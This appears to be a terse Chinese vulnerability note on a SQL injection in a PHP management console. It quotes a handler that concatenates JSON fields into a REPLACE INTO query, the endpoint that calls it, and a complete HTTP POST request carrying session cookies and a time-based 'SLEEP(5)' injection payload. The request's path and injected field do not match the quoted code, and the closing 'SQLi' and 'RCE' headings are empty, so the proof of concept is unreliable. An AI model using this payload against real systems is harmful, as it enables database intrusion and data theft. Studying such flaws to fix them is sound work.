SQL注入 inter/handler_get_set_data/set_sc_count_online_setup_data_cmd.php
函数set_sc_count_online_setup_data_cmd
function set_sc_count_online_setup_data_cmd ($para { global $logHandler , $mysqlDB ; $keyData = array ("client" ,"server" ,"scid" ); $check = checkParam ($keyData ,$para ,$logHandler ); if ($check !== true ) return false ; $SCID = $para ['scid' ]; $data_type ='' ; foreach ($para as $key => $value ) { if ($key =='client' ) { $data_type ='1' ; }else if ($key =='server' ) { $data_type ='0' ; }else {continue ;} $sqlstr =' replace into systemcenter_count(scid,data_type,count_online,count_install,count_unhealth) values(' ; $sqlstr .= $SCID .',' .$data_type .',' . $value ['count_online' ] .',' . $value ['count_install' ].',' . $value ['count_unhealth' ].')' ; try { $mysqlDB ->query ($sqlstr ); } catch (PDOException $e ) { $logHandler ->LogError ("Faild to replace into systemcenter_clientdata database:" .$e ->getMessage ()); return false ; } }
调用点inter/ajax_upload_parent_sc.php
try { $postStr = file_get_contents ('php://input' ); if ($postStr != "" ) { $post = json_decode ($postStr ,JSON_UNESCAPED_UNICODE); if (!$post ) { throw new Exception ("param cann't be json_decode!" ); } } else { throw new Exception ("param cann't be empty!" ); } foreach ($post as $cmd => $inputData ) { if ( upload_data_to_parent_sc ($cmd ,$inputData ) ) { $re = array ("nResult" => 0 ) ; } else { $re =array ("nResult" => 1 ) ; } } echo json_encode ($re ); } catch (Exception $e ) { $re = array ("nResult" => 1 , "mess" => $e ->getMessage ()); echo json_encode ($re ); } function upload_data_to_parent_sc ($cmd_name ,$para global $logHandler , $mysqlDB ; $bFromLocalData =false ; $name_get_file = "handler_get_set_data/get_" .$cmd_name .".php" ; $name_set_file = "handler_get_set_data/set_" .$cmd_name .".php" ; $name_get_func = "get_" .$cmd_name ; $name_set_func = "set_" .$cmd_name ; if (file_exists ($name_get_file ) and file_exists ($name_set_file ) ) { require_once ($name_get_file ); require_once ($name_set_file ); }else { return false ; } if ($para ==nil or $para =='' or count ( $para )<=0 ) { $all_data =false ; if ( function_exists ($name_get_func ) == true ) { $all_data = $name_get_func (); } $bFromLocalData = true ; $logHandler ->LogError ("update_send_client_to_rootsc_cmd 0 " .json_encode ($all_data )); if ($all_data ==false ) return false ; }else { $all_data = $para ; } if ( !$bFromLocalData ) { if ( function_exists ($name_set_func ) == true ) { if (! $name_set_func ($para ) ) { return false ; } } } if ( GetIsRoot ()!=1 ) { $ParentSC_ip =GeParentSCIP (); if ($ParentSC_ip =="" ) { $logHandler ->LogError ("Faild to get parent sc ip" ); return false ; } $ParentSC_port =CheckParentSCOpenPort ($ParentSC_ip ); if ($ParentSC_port =="" ) { $logHandler ->LogError ("Faild to Check parent sc port or parent sc is stop " ); return false ; } $re = uploadDataToParentSC ($cmd_name ,$ParentSC_ip ,$ParentSC_port , $all_data ); if ( $re === false ) return false ; } return true ; }
构造
POST /inter/import_group_list.php HTTP/1.1 Host: 192.168.86.128 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=fho7sdaismnp732n8ttlspvmm5; fromLogin=1; GUID=1FF2C85D-D77A-4BE6-9D7D-80BD14051738; SCIP=192.168.86.128; topSC=0; SCNum=1; kidtype=1; hid=ECAF985A; sn=105000-011000-000000-000000 Connection: close Content-Type: application/json Content-Length: 441 { "sc_count_online_setup_data_cmd": { "server": { "count_online": 1, "count_install": 1, "count_unhealth": 1 }, "client": { "count_online": 1, "count_install": 1, "count_unhealth": 1 }, "scid": "1", "offline_SCID": { "1": "1,2,3,4)/**/&&/**/SLEEP(5)/**/&&/**/(7408=7408" } } }
SQLi mobile/app_virus_info.php
RCE 
